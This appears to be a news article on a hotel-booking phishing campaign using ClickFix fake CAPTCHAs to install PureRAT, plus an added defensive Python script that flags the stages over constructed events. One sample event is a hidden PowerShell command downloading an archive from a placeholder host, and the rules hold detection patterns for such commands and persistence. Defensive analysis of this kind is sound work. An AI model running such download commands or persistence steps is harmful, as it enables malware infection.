Threat analysts at Sekoia.io have uncovered a global phishing operation that has been targeting the hospitality industry through compromised Booking.com and Expedia accounts, in a campaign that blends social engineering, malware delivery, and financial fraud. The investigation reveals that attackers are exploiting stolen hotel credentials to distribute banking phishing messages and infect systems with the PureRAT remote access trojan.
The campaign—tracked by Sekoia’s Threat Detection and Response (TDR) team since April 2025—exploits hotel booking platforms as the initial entry point. Attackers first compromise hotel or travel agency accounts, then use these to contact unsuspecting guests with authentic reservation data to enhance credibility.
“This activity proved particularly effective because the threat actor possessed customer data, including personal identifiers and reservation details, which further increased the credibility of the phishing attempts.”
The emails typically mimic legitimate Booking.com communications, using subject lines such as “New guest message linked to your listing” or “New last-minute booking.” When victims click the embedded link, they are redirected through multiple domains to a malicious page disguised as Booking.com’s administration portal, initiating what Sekoia calls the ClickFix infection chain.
The campaign’s infection flow involves a series of sophisticated steps designed to evade detection and ensure persistence on the victim’s machine.
Sekoia explains, “The malicious email sent by the attacker contained a URL that pointed to a redirection infrastructure… The objective is to redirect the user to the same URL but over HTTP… which instantly forwarded the victim to the ClickFix URL.”
This final landing page mimics Booking.com’s extranet and prompts the victim to solve a fake CAPTCHA. The trap? The user is asked to copy and execute a PowerShell command — the now infamous “ClickFix reCAPTCHA” technique.
“The copied and subsequently executed command included PowerShell instructions to compromise the machine with malware.”
Once executed, the command downloads a ZIP archive containing a Windows executable and several DLLs. These components establish persistence via registry keys and startup shortcuts, before deploying PureRAT, a powerful remote access trojan capable of file theft, screen capture, keylogging, and command execution.
The investigation revealed that PureRAT, also known as PureHVNC or ResolverRAT, is being sold as part of a Malware-as-a-Service (MaaS) package developed by PureCoder, a known cybercrime vendor.
PureRAT provides remote desktop access, microphone and webcam capture, data exfiltration, and modular plugin support. It communicates over encrypted TCP/TLS channels using ports 56001–56003 and employs reflective DLL loading to remain fileless and undetectable.
This level of obfuscation, combined with the use of legitimate Windows components like AddInProcess32.exe, makes the campaign particularly stealthy.
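As an added defender-side illustration (not from the Sekoia report or this article), the rule set below runs over constructed Sysmon-style events and flags the stages described above: a hidden or downloading PowerShell launched from explorer.exe (the Run-dialog ClickFix pattern), outbound connections on 56001-56003 or from AddInProcess32.exe, and Run-key or Startup-folder persistence. Field names, paths and hosts are constructed placeholders, and the explorer.exe parent check is a heuristic.

```python
import re

# Constructed Sysmon-style events for illustration; field names are simplified and
# every host, path and value is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://redirect.invalid/x.zip -OutFile $env:TEMP\x.zip"'},
    {"event": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "dst_ip": "203.0.113.10", "dst_port": 56002},
    {"event": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\guest\AppData\Roaming\svc\updater.exe"},
    {"event": "file", "path": r"C:\Users\guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell Get-Date"},
]

# Flags typical of a pasted ClickFix one-liner: hidden window, encoded command, inline download.
CLICKFIX_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biwr\b|invoke-webrequest|downloadstring", re.I)
PURERAT_PORTS = range(56001, 56004)   # 56001-56003, the C2 ports named in the report
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\.*\.lnk$", re.I)

def check_event(ev):
    """Return a finding string for one event, or None if no rule matches."""
    kind = ev["event"]
    if kind == "process" and ev["image"].lower().endswith("powershell.exe"):
        # A command pasted into the Win+R dialog runs as a child of explorer.exe (heuristic).
        if ev["parent"].lower().endswith("explorer.exe") and CLICKFIX_FLAGS.search(ev["cmdline"]):
            return "clickfix: hidden/download PowerShell spawned from explorer.exe"
    elif kind == "network":
        proc = ev["image"].rsplit("\\", 1)[-1]
        if ev["dst_port"] in PURERAT_PORTS:
            return f"purerat-c2: outbound TCP {ev['dst_port']} from {proc}"
        if proc.lower() == "addinprocess32.exe":
            return "suspicious: AddInProcess32.exe making a network connection"
    elif kind == "registry":
        if "\\currentversion\\run\\" in ev["key"].lower() and USER_WRITABLE.search(ev["value"]):
            return "persistence: Run key pointing at a user-writable path"
    elif kind == "file" and STARTUP_LNK.search(ev["path"]):
        return "persistence: shortcut dropped in the Startup folder"
    return None

def scan(events):
    """Return (index, finding) pairs for every event that matches a rule."""
    return [(i, hit) for i, ev in enumerate(events) if (hit := check_event(ev))]

if __name__ == "__main__":
    for i, hit in scan(SAMPLE_EVENTS):
        print(f"event {i}: {hit}")
```

The last sample event, an interactive PowerShell session started from cmd.exe, is left unflagged to show the rules do not fire on ordinary PowerShell use.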
Beyond the technical infection chain, Sekoia’s analysts found that a large underground market has emerged to trade compromised Booking.com and Expedia accounts, complete with customer data, hotel contact lists, and authentication cookies.
Attackers use infostealer malware to harvest credentials from hotel staff, which are later resold in bulk on Russian-speaking cybercrime forums. Depending on the account’s access level, prices range from a few dollars to several thousand for high-value administrator credentials managing multiple properties.
The threat actor “moderator_booking”, who has been active across forums such as Exploit.in and LolzTeam, reportedly leads a team that has “earned over $20 million in this field.”
Attackers use WhatsApp or email to contact hotel customers directly, urging them to “verify payment details” on a phishing page identical to Booking.com’s interface. The page, hosted on bulletproof Russian infrastructure, is protected by Cloudflare’s Turnstile antibot and designed to steal victims’ banking credentials.
This infrastructure, traced to AS216341 (OPTIMA LLC) in Russia, appears to serve as a bulletproof hosting provider for financial phishing operations.